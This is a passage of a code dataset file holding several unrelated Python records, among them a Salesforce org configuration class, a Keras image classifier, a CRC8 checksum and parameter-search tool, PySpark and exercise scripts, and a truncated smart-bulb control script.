generate_kg()\n\n\n\n\n\n\n","repo_name":"JavaStudenttwo/BERT_MRC","sub_path":"data_dir/KG_Covid19_Task1/process/origin_process.py","file_name":"origin_process.py","file_ext":"py","file_size_in_byte":21283,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"71302260266","text":"from __future__ import print_function\n\nimport os, sys\n\nTHREADS_LIMIT = 1\nos.environ['MKL_NUM_THREADS'] = str(THREADS_LIMIT)\nos.environ['NUMEXPR_NUM_THREADS'] = str(THREADS_LIMIT)\nos.environ['OMP_NUM_THREADS'] = str(THREADS_LIMIT)\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.metrics\nimport time\nimport pickle\n\nos.environ['MPLBACKEND'] = 'agg'\nimport vip_hci as vip\n\nimport multiprocessing\n\nfrom datasets import loader\n# from tqdm import tqdm\n\nfrom grmf import GRMF\nfrom pca import PCA\n\nfrom util import cube_collapse, cube_expand, annulus_mapping\nfrom perf_assess import perf_assess_gomez2017\n\n\ndef hms_string(sec_elapsed):\n h = int(sec_elapsed / (60 * 60))\n m = int((sec_elapsed % (60 * 60)) / 60)\n s = sec_elapsed % 60.\n if h > 0:\n return \"{}h{:>02}m{:>05.2f}s\".format(h, m, s)\n elif m > 0:\n return \"{:>02}m{:>05.2f}s\".format(m, s)\n else:\n return \"{:>05.2f}s\".format(s)\n \n\ndef run_perf_assess(\n dataset='bpic_naco_empty',\n cube_size=50, tscale=1., xscale=1.,\n n_samples_per_res=5, sep_from=1., sep_to=4., flevel_from=50, flevel_to=200,\n seed=0, n_jobs=None,\n prad=1., model=None, opts=dict(),\n):\n dataset_name = dataset\n model_name = model\n \n if n_jobs is None:\n n_jobs = max(1, (multiprocessing.cpu_count() - 4)/THREADS_LIMIT)\n \n if model is None:\n print(\"Please provide a model\")\n exit(1)\n \n \n ### MODEL LOADING ###\n\n n_samples = int(n_samples_per_res * 4 * (sep_to**2 - sep_from**2))\n model = globals()[model_name](**opts)\n \n \n ### DATASET LOADING ###\n \n # Load data\n dataset = loader(dataset_name)\n print(\"Loaded dataset {}\".format(dataset_name))\n \n # Rescale, possibly\n if xscale != 1. or tscale != 1.:\n dataset = dataset.resample(spatial=xscale, temporal=tscale)\n print(\"Cube resampled by factors {} (spatially) and {} (temporally)\".format(xscale, tscale))\n \n # Resize\n dataset = dataset.resize(cube_size)\n print(\"Cube resized to ({}, {})\".format(*dataset.cube.shape[1:]))\n \n \n ### WRITING HEADER ###\n\n params = dict(\n dataset=dataset_name,\n cube_size=cube_size,\n tscale=tscale,\n xscale=xscale,\n \n n_samples=n_samples,\n sep_from=sep_from,\n sep_to=sep_to,\n flevel_from=flevel_from,\n flevel_to=flevel_to,\n seed=seed,\n \n model=model_name,\n opts=opts,\n )\n \n output_filename = 'perf/{}_gomez2017_{}.pkl'.format(thetime, params['model'])\n print(\"Writing results to \\\"{}\\\"\".format(output_filename))\n \n \n ### DATA COLLECTION ###\n \n start_time = time.time()\n\n print()\n print(\"Starting data collection on loaded dataset, with parameters:\")\n print(\" - Samples {}\".format(n_samples))\n print(\" - Annulus {}--{} (FWHM)\".format(sep_from, sep_to))\n print(\" - Injected flux level {}--{}\".format(flevel_from, flevel_to))\n print(\" - Model \\\"{}\\\"\".format(\n type(model).__name__\n ))\n print(\" with parameters: {}\".format(\n ', '.join('{}={}'.format(k, repr(v)) for (k, v) in opts.iteritems())\n ))\n print(\" - Random seed {}\".format(seed))\n print(\" - Nbr of parallel processes {}\".format(n_jobs))\n print()\n \n negatives, positives = perf_assess_gomez2017(\n dataset, n_samples, [sep_from, sep_to], [flevel_from, flevel_to],\n model,\n random_state=seed,\n n_jobs=n_jobs, verbose=10\n )\n \n with open(output_filename, 'w') as f:\n pickle.dump(params, f)\n pickle.dump(negatives, f)\n pickle.dump(positives, f)\n \n stop_time = time.time()\n \n print()\n print(\"Finished\")\n print(\"Elapsed time: {}\".format(hms_string(stop_time-start_time)))\n\n\nif __name__ == '__main__':\n \n thetime = time.strftime(\"%Y%m%d-%H%M%S\")\n \n ### CONFIGURATION ###\n \n # Default params\n params = dict(\n dataset='bpic_naco_empty',\n cube_size=50,\n tscale=1.,\n xscale=1.,\n\n n_samples_per_res=5,\n sep_from=1.,\n sep_to=4.,\n flevel_from=50,\n flevel_to=200,\n seed=0,\n )\n \n # Read from STDIN if available\n if len(sys.argv) > 1:\n if sys.argv[1] == 'stdin':\n p = pickle.load(sys.stdin)\n params.update(p)\n \n # Otherwise, use local config\n else:\n \n ### CHANGE STUFF HERE ###\n params['opts'] = dict(\n rank=17\n )\n params['model'] = 'PCA'\n #########################\n \n run_perf_assess(**params)\n \n","repo_name":"xlambein/lambein-remove-2019","sub_path":"perf_assess_gomez2017.py","file_name":"perf_assess_gomez2017.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42092375752","text":"n = int(input())\ndata = sorted(list(map(int, input().split())))\ngroup = 0 # 총 그룹의 수\n\ncount = 0 # 현재 그룹에 포함된 모험가의 수\nfor d in data:\n count += 1\n if d <= count:\n group += 1\n count = 0\n\nprint(group)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"study-demo/greedy/solution7.py","file_name":"solution7.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14547988944","text":"import os\n\nimport requests\n\nfrom simple_salesforce import Salesforce\n\nfrom cumulusci.core.config import BaseConfig\nfrom cumulusci.core.exceptions import SalesforceCredentialsException\nfrom cumulusci.oauth.salesforce import SalesforceOAuth2\nfrom cumulusci.oauth.salesforce import jwt_session\n\n\nSKIP_REFRESH = os.environ.get(\"CUMULUSCI_DISABLE_REFRESH\")\n\n\nclass OrgConfig(BaseConfig):\n \"\"\" Salesforce org configuration (i.e. org credentials) \"\"\"\n\n # make sure it can be mocked for tests\n SalesforceOAuth2 = SalesforceOAuth2\n\n def __init__(self, config, name):\n self.name = name\n self._community_info_cache = {}\n self._client = None\n self._latest_api_version = None\n super(OrgConfig, self).__init__(config)\n\n def refresh_oauth_token(self, keychain, connected_app=None):\n if not SKIP_REFRESH:\n SFDX_CLIENT_ID = os.environ.get(\"SFDX_CLIENT_ID\")\n SFDX_HUB_KEY = os.environ.get(\"SFDX_HUB_KEY\")\n if SFDX_CLIENT_ID and SFDX_HUB_KEY:\n info = jwt_session(\n SFDX_CLIENT_ID, SFDX_HUB_KEY, self.username, self.instance_url\n )\n else:\n info = self._refresh_token(keychain, connected_app)\n if info != self.config:\n self.config.update(info)\n self._load_userinfo()\n self._load_orginfo()\n\n def _refresh_token(self, keychain, connected_app):\n if keychain: # it might be none'd and caller adds connected_app\n connected_app = keychain.get_service(\"connected_app\")\n if connected_app is None:\n raise AttributeError(\n \"No connected app or keychain was passed to refresh_oauth_token.\"\n )\n client_id = self.client_id\n client_secret = self.client_secret\n if not client_id:\n client_id = connected_app.client_id\n client_secret = connected_app.client_secret\n sf_oauth = self.SalesforceOAuth2(\n client_id,\n client_secret,\n connected_app.callback_url, # Callback url isn't really used for this call\n auth_site=self.instance_url,\n )\n\n resp = sf_oauth.refresh_token(self.refresh_token)\n if resp.status_code != 200:\n raise SalesforceCredentialsException(\n f\"Error refreshing OAuth token: {resp.text}\"\n )\n return resp.json()\n\n @property\n def lightning_base_url(self):\n return self.instance_url.split(\".\")[0] + \".lightning.force.com\"\n\n @property\n def salesforce_client(self):\n if not self._client:\n self._client = Salesforce(\n instance=self.instance_url.replace(\"https://\", \"\"),\n session_id=self.access_token,\n version=\"45.0\",\n )\n return self._client\n\n @property\n def latest_api_version(self):\n if not self._latest_api_version:\n response = self.salesforce_client._call_salesforce(\n \"GET\", f\"https://{self.salesforce_client.sf_instance}/services/data\"\n )\n self._latest_api_version = str(response.json()[-1][\"version\"])\n return self._latest_api_version\n\n @property\n def start_url(self):\n start_url = \"%s/secur/frontdoor.jsp?sid=%s\" % (\n self.instance_url,\n self.access_token,\n )\n return start_url\n\n @property\n def user_id(self):\n return self.id.split(\"/\")[-1]\n\n @property\n def org_id(self):\n return self.id.split(\"/\")[-2]\n\n @property\n def username(self):\n \"\"\" Username for the org connection. \"\"\"\n username = self.config.get(\"username\")\n if not username:\n username = self.userinfo__preferred_username\n return username\n\n def load_userinfo(self):\n self._load_userinfo()\n\n def _load_userinfo(self):\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n response = requests.get(\n self.instance_url + \"/services/oauth2/userinfo\", headers=headers\n )\n if response != self.config.get(\"userinfo\", {}):\n self.config.update({\"userinfo\": response.json()})\n\n def can_delete(self):\n return False\n\n def _load_orginfo(self):\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n self._org_sobject = requests.get(\n self.instance_url\n + f\"/services/data/v45.0/sobjects/Organization/{self.org_id}\",\n headers=headers,\n ).json()\n result = {\n \"org_type\": self._org_sobject[\"OrganizationType\"],\n \"is_sandbox\": self._org_sobject[\"IsSandbox\"],\n }\n self.config.update(result)\n\n @property\n def organization_sobject(self):\n return self._org_sobject\n\n def _fetch_community_info(self):\n \"\"\"Use the API to re-fetch information about communities\"\"\"\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n response = requests.get(\n self.instance_url + \"/services/data/v45.0/connect/communities\",\n headers=headers,\n ).json()\n\n # Since community names must be unique, we'll return a dictionary\n # with the community names as keys\n result = {community[\"name\"]: community for community in response[\"communities\"]}\n return result\n\n def get_community_info(self, community_name, force_refresh=False):\n \"\"\"Return the community information for the given community\n\n An API call will be made the first time this function is used,\n and the return values will be cached. Subsequent calls will\n not call the API unless the requested community name is not in\n the cached results, or unless the force_refresh parameter is\n set to True.\n\n \"\"\"\n\n if force_refresh or community_name not in self._community_info_cache:\n self._community_info_cache = self._fetch_community_info()\n\n if community_name not in self._community_info_cache:\n raise Exception(\n f\"Unable to find community information for '{community_name}'\"\n )\n\n return self._community_info_cache[community_name]\n","repo_name":"justindixon/CumulusCI","sub_path":"cumulusci/core/config/OrgConfig.py","file_name":"OrgConfig.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"19567195321","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\n\n\n\nbatch_size = 16\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(250, 250, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\nmodel.summary()\n\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\nvalidation_generator = test_datagen.flow_from_directory(\n 'dataset/val',\n target_size=(250, 250),\n batch_size=batch_size,\n class_mode='categorical')\n\n\n\n\ntrain_generator = train_datagen.flow_from_directory(\n 'dataset/train', # this is the target directory\n target_size=(250, 250), # all images will be resized to 150x150\n batch_size=batch_size,\n class_mode='categorical')\n\nhistory_1 = model.fit_generator(\n train_generator,\n steps_per_epoch=2000 // batch_size,\n epochs=15,\n validation_data=validation_generator,\n validation_steps=800 // batch_size)\n\nfig = plt.figure()\nfig.set_size_inches(15, 15)\ngs = gridspec.GridSpec(3, 2, figure=fig)\nax1 = fig.add_subplot(gs[0, 0])\n\nax1.plot(history_1.history['loss'])\nax1.plot(history_1.history['val_loss'])\nplt.title('Model Loss for vanilla CNN')\nax1.set_ylabel('Loss')\n\nax2 = fig.add_subplot(gs[0, 1])\nax2.plot(history_1.history['accuracy'])\nax2.plot(history_1.history['val_accuracy'])\nplt.title('Model Accuracy for vanilla CNN')\nax2.set_ylabel('Accuracy')\n\nplt.show()\n\n#model_json = model.to_json()\n#with open(\"model.json\", \"w\") as json_file:\n# json_file.write(model_json)\nmodel.save('model.h5')\n","repo_name":"vonschtirlitz/weapon_cnn","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71121470188","text":"# 11387. 몬스터 사냥\n\ndef damage(n):\n global D, L\n global result\n dam = D + D*n*L/100\n result += dam\n\n\nT = int(input())\nfor t in range(1, T+1):\n # 데미지, 퍼센트, 횟수\n D, L, N = map(int, input().split())\n result = 0\n for i in range(N):\n damage(i)\n print('#%d %d'%(t, round(result)))\n","repo_name":"haesungbang/Algorithm","sub_path":"swea/d_3/0502_11387.py","file_name":"0502_11387.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74548926186","text":"# -*- coding: utf-8 -*-\n# @Author : Xu Bai\n# @Time : 2022/6/6 下午7:40\n# @Desc :\nfrom abc import ABCMeta, abstractmethod\n\nprint(\"\"\"\n使用场景:\n 表示对象的“部分-整体”层次结构(特别结构是递归的)\n 希望用户忽略组合对象与单个对象的不同,用户统一的使用组合结构的所有对象\n优点:\n 定义了包括基本对象和组合对象的层次结构\n 简化客户端代码,即客户端可以一致的使用组合对象和单个对象\n 更容易增加新类型的组件\n------------------------------------------------------------------\n\"\"\")\n\n\nclass Graphic(metaclass=ABCMeta):\n @abstractmethod\n def draw(self):\n pass\n\n\n# 简单对象\nclass Point(Graphic):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return f'点({self.x}, {self.y})'\n\n def draw(self):\n print(str(self))\n\n\nclass Line(Graphic):\n def __init__(self, p1, p2):\n self.p1 = p1\n self.p2 = p2\n\n def __str__(self):\n return '线段[%s, %s]' % (self.p1, self.p2)\n\n def draw(self):\n print(str(self))\n\n\n# 复杂对象\nclass Picture:\n def __init__(self, iterable):\n self.children = []\n for g in iterable:\n self.add(g)\n\n def add(self, graphic):\n self.children.append(graphic)\n\n def draw(self):\n print('+-+-+-复合图形+-+-+-')\n for g in self.children:\n g.draw()\n print('------复合图形------')\n\n\nl = Line(Point(1, 1, ), Point(2, 2))\nprint(l)\np1 = Point(2, 3)\nl1 = Line(Point(3, 4), Point(6, 7))\nl2 = Line(Point(1, 5), Point(2, 8))\npic1 = Picture([p1, l1, l2])\npic1.draw()\npic2 = Picture([pic1, pic1, l1])\npic2.draw()\n","repo_name":"by777/design_pattern_py","sub_path":"composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32032284261","text":"def D(n):\n div = []\n for i in range(2, int(n**.5) + 1):\n if n % i == 0:\n if i % 2:\n div.append(i)\n if i != n // i and (n // i) % 2:\n div.append(n // i)\n if len(div) < 6:\n return 0, 0\n div.sort(reverse=True)\n return div[5], len(div)\n\n\ncount = 0\nN = 200_000_001\nwhile count != 5:\n w = D(N)\n if w[0] != 0:\n print(w[0], w[1])\n count += 1\n N += 1","repo_name":"ivbachantcev/EGEBurg_2022","sub_path":"ПР17. Числа с заданными свойствами/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6622350575","text":"\"\"\"\n@company: FSVIC\n@author: kindred\n@date: 2021-01-10\n@version: 1.0\n@desc:\n 1 正向CRC8校验(直接算法)\n 2 CRC8查表法校验\n 3 生成CRC8校验表(.CSV)\n 4 通过两组数据及对应CRC值,反查CRC模型参数\n\"\"\"\nimport re\nimport os\nimport pandas as pd\nimport multiprocessing\n\n\ndef get_input_data():\n \"\"\"返回输入的16进制数据列表\"\"\"\n data_1 = input('数据1(用空格隔开):')\n data_2 = input('数据2(用空格隔开):')\n byt_1 = [int(i, 16) for i in data_1.split()]\n byt_2 = [int(i, 16) for i in data_2.split()]\n return byt_1, byt_2\n\n\ndef get_log_data():\n \"\"\"导入log,提取指定ID的2个信号数据\"\"\"\n data_list = []\n byt1 = []\n byt2 = []\n\n _id = input('输入CAN ID(16进制):')\n log = input('log文件路径:') # log_file = r'C:\\Users\\kindred\\Desktop\\logger.asc'\n\n f = open(log, encoding='gbk')\n lines = f.readlines()\n for line in lines[:10000]:\n line_list = line.split()\n try:\n if int(_id, 16) == int(line_list[2], 16):\n _match = re.match(r'.*?Rx.*?\\d (.*?)$', line)\n data_list.append(_match.group(1))\n except ValueError:\n pass\n if len(data_list) >= 2:\n byt1 = [int(i, 16) for i in data_list[0].split(' ')]\n byt2 = [int(i, 16) for i in data_list[1].split(' ')]\n else:\n print(\"所选Message在总线前10000条通讯不足2个\")\n f.close()\n return byt1, byt2\n\n\ndef data_reverse(data):\n \"\"\"用于处理数据的输入输出反转\"\"\"\n reverse_data = '{:08b}'.format(data)[::-1]\n new_data = int(reverse_data, 2)\n return new_data\n\n\ndef get_crc_value(init, poly, data, refin1, refout1, xorout1):\n \"\"\"计算CRC校验值\"\"\"\n crc = init\n if refin1:\n data = [data_reverse(m) for m in data]\n for i in range(len(data)): # 遍历原数据\n crc ^= data[i]\n for j in range(8): # 按位异或(8位)\n if crc & 0x80: # 判断最高位是否为1\n crc = (crc << 1) ^ poly # 移位后与多项式异或\n else:\n crc = crc << 1\n crc = crc & 0xff\n if refout1:\n crc = data_reverse(crc)\n crc = crc ^ xorout1\n return crc\n\n\ndef create_crc_table(_ploy):\n \"\"\"根据多项式,生成CRC表\"\"\"\n crc_table = []\n for i in range(256):\n crc = i\n for j in range(8):\n if crc & 0x80: # 判断最高位是否为1\n crc = (crc << 1) ^ _ploy\n else:\n crc = crc << 1\n crc = crc & 0xff\n crc_table.append(crc)\n return crc_table\n\n\ndef get_crctable_csv(crc_table):\n \"\"\"将生成的CRC表存为CSV文件\"\"\"\n total_list = []\n headers = []\n table = []\n for crc in crc_table:\n _crc = '0x' + format(crc & 0xff, '02x') # 格式化输出\n total_list.append(_crc) # 加进列表\n for n in range(0, len(total_list), 16): # 分割列表,每个列表长度为16\n table.append(total_list[n:n + 16])\n for h in range(16): # 生成表头,为转成CSV文件准备\n headers.append(h)\n writer = pd.DataFrame(columns=headers, data=table)\n if not os.path.exists('file'):\n os.mkdir('file')\n writer.to_csv('file/CRC_Table.csv', index=False, header=False) # 生成CSV文件,隐藏表头和序列\n\n\ndef table_method(crctable, data, init, refin1, refout1, xorout1):\n \"\"\"查表法计算CRC值\"\"\"\n crc = init\n if refin1:\n data = [data_reverse(m) for m in data]\n for i in range(len(data)):\n crc = crctable[crc ^ data[i]]\n if refout1:\n crc = data_reverse(crc)\n crc = crc ^ xorout1\n print(\"CRC���(查表法):\", hex(crc))\n\n\ndef reverse_crc_1(data1, data2, crc1, crc2):\n \"\"\"通过两组数组及对应CRC反推CRC多项式、初始值,\n 输入、输出反转\n \"\"\"\n for _poly in range(256): # 多项式范围\n for i in range(256): # 初始值范围\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, True, True, xorout) == crc1: # 校验数据\n if get_crc_value(i, _poly, data2, True, True, xorout) == crc2:\n _f = open('file/reverse_crc_1.txt', 'a', encoding='utf-8')\n _f.write(\"多项式:0x{:02x}\\n\".format(_poly))\n _f.write(\"初始值:0x{:02x}\\n\".format(i))\n _f.write(\"输入反转:True\\n\")\n _f.write(\"输出反转:True\\n\")\n _f.write(\"结果异或值:0x{:02x}\\n\".format(xorout))\n _f.write(\"------------\\n\")\n _f.close()\n\n\ndef reverse_crc_2(data1, data2, crc1, crc2):\n \"\"\"通过两组数组及对应CRC反推CRC多项式、初始值,\n 输入反转,输出不反转\n \"\"\"\n for _poly in range(256): # 多项式范围\n for i in range(256): # 初始值范围\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, True, False, xorout) == crc1: # 校验数据\n if get_crc_value(i, _poly, data2, True, False, xorout) == crc2:\n _f = open('file/reverse_crc_2.txt', 'a', encoding='utf-8')\n _f.write(\"多项式:0x{:02x}\\n\".format(_poly))\n _f.write(\"初始值:0x{:02x}\\n\".format(i))\n _f.write(\"输入反转:True\\n\")\n _f.write(\"输出反转:False\\n\")\n _f.write(\"结果异或值:0x{:02x}\\n\".format(xorout))\n _f.write(\"-*-*-*-*-*-*-\\n\")\n _f.close()\n\n\ndef reverse_crc_3(data1, data2, crc1, crc2):\n \"\"\"通过两组数组及对应CRC反推CRC多项式、初始值,\n 输入不反转,输出反转\n \"\"\"\n for _poly in range(256): # 多项式范围\n for i in range(256): # 初始值范围\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, False, True, xorout) == crc1: # 校验数据\n if get_crc_value(i, _poly, data2, False, True, xorout) == crc2:\n _f = open('file/reverse_crc_3.txt', 'a', encoding='utf-8')\n _f.write(\"多项式:0x{:02x}\\n\".format(_poly))\n _f.write(\"初始值:0x{:02x}\\n\".format(i))\n _f.write(\"输入反转:False\\n\")\n _f.write(\"输出反转:True\\n\")\n _f.write(\"结果异或值:0x{:02x}\\n\".format(xorout))\n _f.write(\"*-*-*-*-*-*-*\\n\")\n _f.close()\n\n\ndef reverse_crc_4(data1, data2, crc1, crc2):\n \"\"\"通过两组数组及对应CRC反推CRC多项式、初始值,\n 输入、输出不反转\n \"\"\"\n for _poly in range(256): # 多项式范围\n for i in range(256): # 初始值范围\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, False, False, xorout) == crc1: # 校验数据\n if get_crc_value(i, _poly, data2, False, False, xorout) == crc2:\n _f = open('file/reverse_crc_4.txt', 'a', encoding='utf-8')\n _f.write(\"多项式:0x{:02x}\\n\".format(_poly))\n _f.write(\"初始值:0x{:02x}\\n\".format(i))\n _f.write(\"输入反转:False\\n\")\n _f.write(\"输出反转:False\\n\")\n _f.write(\"结果异或值:0x{:02x}\\n\".format(xorout))\n _f.write(\"*************\\n\")\n _f.close()\n\n\ndef handle_data():\n \"\"\"用于CRC模型参数输入\"\"\"\n refin2 = False\n refout2 = False\n init2 = int(input(\"c.输入初始值(16进制):\"), 16)\n mark_in = input(\"输入反转:1.反转;2.不反转:\")\n mark_out = input(\"输出反转:1.反转;2.不反转:\")\n xorout2 = int(input(\"输入结果异或值(16进制):\"), 16)\n\n check_data = input('a.输入需校验的数据位(用空格隔开):')\n d = [int(i, 16) for i in check_data.split()]\n\n if mark_in == '1':\n refin2 = True\n elif mark_in == '2':\n refin2 = False\n else:\n print(\"请输入1或2\")\n if mark_out == '1':\n refout2 = True\n elif mark_out == '2':\n refout2 = False\n else:\n print(\"请输入1或2\")\n return init2, d, refin2, refout2, xorout2\n\n\nif __name__ == '__main__':\n multiprocessing.freeze_support()\n d1 = []\n d2 = []\n\n method = int(input('功能选择(1.校验; 2.查表; 3.生成校验表; 4.反查): '))\n if method == 1 or method == 2 or method == 3:\n print('<-----获取数据----->')\n ploy = int(input(\"b.输入多项式(16进制):\"), 16)\n if method == 3:\n get_crctable_csv(create_crc_table(ploy))\n else:\n _init, d1, refin, refout, _xorout = handle_data()\n if method == 1:\n result = get_crc_value(_init, ploy, d1, refin, refout, _xorout)\n print('CRC值(正向校验):', hex(result))\n if method == 2:\n table_method(create_crc_table(ploy), d1, _init, refin, refout, _xorout)\n\n elif method == 4:\n sel = int(input('数据录入方式选择(1.输入16进制数据(含校验位,如\\'37 40 04 00 00 00 1c e6\\'); 2.导入log):'))\n if sel == 1:\n d1, d2 = get_input_data()\n elif sel == 2:\n d1, d2 = get_log_data()\n else:\n print(\"输入错误\")\n if not os.path.exists('file'):\n os.mkdir('file')\n\n args_t = (d1[:-1], d2[:-1], d1[-1], d2[-1],)\n\n # 多进程\n p1 = multiprocessing.Process(target=reverse_crc_1, args=args_t)\n p2 = multiprocessing.Process(target=reverse_crc_2, args=args_t)\n p3 = multiprocessing.Process(target=reverse_crc_3, args=args_t)\n p4 = multiprocessing.Process(target=reverse_crc_4, args=args_t)\n\n p1.start()\n p2.start()\n p3.start()\n p4.start()\n\n p1.join()\n p2.join()\n p3.join()\n p4.join()\n print(\"匹配完成,已存入.txt文件\")\n else:\n print(\"输入错误\")\n\n os.system('pause') # 让程序暂停\n","repo_name":"kindred-7/CRC-Kit","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17524557429","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col,year,to_timestamp,month,dayofweek,date_format\n\n\nif __name__ == '__main__':\n spark = SparkSession.builder \\\n .appName(\"Assignment6thJan\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n df = spark.read.format('csv') \\\n .option('delimiter', ',') \\\n .option('header', 'True') \\\n .option('inferSchema', 'True') \\\n .load('file:///home/saif/LFS/datasets/txns')\n df = df.withColumn('txndate', to_timestamp(df[\"txndate\"], 'MM-dd-yyyy'))\n df1 = df.withColumn('year', year(df['txndate'])) \\\n .withColumn('month', month(df['txndate'])) \\\n .withColumn('day', date_format(df['txndate'], 'EEEE'))\n df2 = df1[\"txndate\", \"amount\"].groupby('txndate').sum()\n df2.write.option(\"header\", True) \\\n .mode(\"overwrite\") \\\n .json(\"hdfs://localhost:9000/user/saif/HFS/Output/df_op/txns_json\")","repo_name":"melwinmpk/Spark","sub_path":"pySpark_part2/assignment6thJan.py","file_name":"assignment6thJan.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72944196908","text":"# Created By: Abdullah Najeeb\n# Date: 10/14/2019\n'''\n\n\nimport random\n\ndef encryption(S, n):\n S.lower()\n alphabet = ('abcdefghijklmnopqrstuvwxyz')\n newString = ''\n for x in S:\n if x == ' ':\n newString+= ' '\n continue\n index = alphabet.find(x)\n index += n\n if index >= 26:\n index = 0 + index % 26\n newString += alphabet[index]\n newString += str(n)\n return newString\n\ndef decryption(W):\n count = 0\n for x in range(len(W)):\n if W[x].isdigit():\n var = W[x:]\n break\n count += 1\n var = int(var)\n var =- var\n string = W[0:count]\n decrypt = encryption(string, var)\n return decrypt[0:count]\n\ndef main():\n print(encryption('hello world', 1))\n print(decryption('ebiil tloia23'))\n randomSeed()\n\ndef randomSeed():\n random.seed(10)\n\n #Generate Random Number First Time\n var = random.randint(1, 27)\n first = encryption('hello world', var)\n print(first)\n print(decryption(first))\n\n #Generate Random Number Second Time\n randVar = random.randint(1, 27)\n second = encryption('computer science', randVar)\n print(second)\n print(decryption(second))\n\n #Generate Random Number Third Time\n randNum = random.randint(1, 27)\n third = encryption('abdullah najeeb', randNum)\n print(third)\n print(decryption(third))\n\n\n\nmain()\n\n'''\n\nimport turtle\n\nt = turtle.Turtle()\n\n\ndef drawRectangle(t, length, width, x, y, color, pensize, heading):\n \"\"\" t is a Turtle object. \"\"\"\n t.pensize(pensize)\n t.setheading(heading)\n t.penup()\n t.pendown()\n t.fillcolor(color)\n t.begin_fill()\n t.back(.5 * length)\n t.forward(length)\n t.left(90)\n t.forward(width)\n t.left(90)\n t.forward(length)\n t.left(90)\n t.forward(width)\n t.end_fill()\n t.setheading(0)\n t.pensize()\n t.setheading()\n\n\ndrawRectangle(t, 50, -50, 75, 15, \"green\", 45, 2)\ndrawRectangle(t, 0, 0, 30, 75, \"orange\", 0, 10)\ndrawRectangle(t, 100, 100, 25, 25, \"purple\", 75, 5)\nturtle.done()\n","repo_name":"anajee2/python-projects","sub_path":"Project 1.py","file_name":"Project 1.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3085070356","text":"# petmorri@cisco.com\n# change_bulb.py\t-\tthis file provides the functionality for changing the status of the bulb based on data pulled from AppD\n\nimport sys\nimport os\nimport uuid\nimport argparse\nimport requests\nimport time\nfrom pytradfri import Gateway\nfrom pytradfri.api.libcoap_api import APIFactory\nfrom pytradfri.error import PytradfriError\nfrom pytradfri.util import load_json, save_json\nfolder = os.path.dirname(os.path.abspath(__file__)) # noqa\nsys.path.insert(0, os.path.normpath(\"%s/..\" % folder)) # noqa\n\nCONFIG_FILE = 'tradfri_standalone_psk.conf'\n\n# Parse Tradfri credentials\nparser = argparse.ArgumentParser()\nparser.add_argument('host', metavar='IP', type=str,\n help='IP Address of your Tradfri gateway')\nparser.add_argument('-K', '--key', dest='key', required=False,\n help='Security code found on your Tradfri gateway')\nparser.add_argument('-S','--state', dest='set_state',required=False)\nargs = parser.parse_args()\n\nif args.host not in load_json(CONFIG_FILE) and args.key is None:\n print(\"Please provide the 'Security Code' on the back of your \"\n \"Tradfri gateway:\", end=\" \")\n key = input().strip()\n if len(key) != 16:\n raise PytradfriError(\"Invalid 'Security Code' provided.\")\n else:\n args.key = key\nif args.set_state is not None:\n set_state = args.set_state\n\n# Make a call to the AppDynamics API to get the current value of people in the room\ndef query_appd_metric():\n params=(('metric-path', 'Analytics|Cisco_Meraki_Camera average person 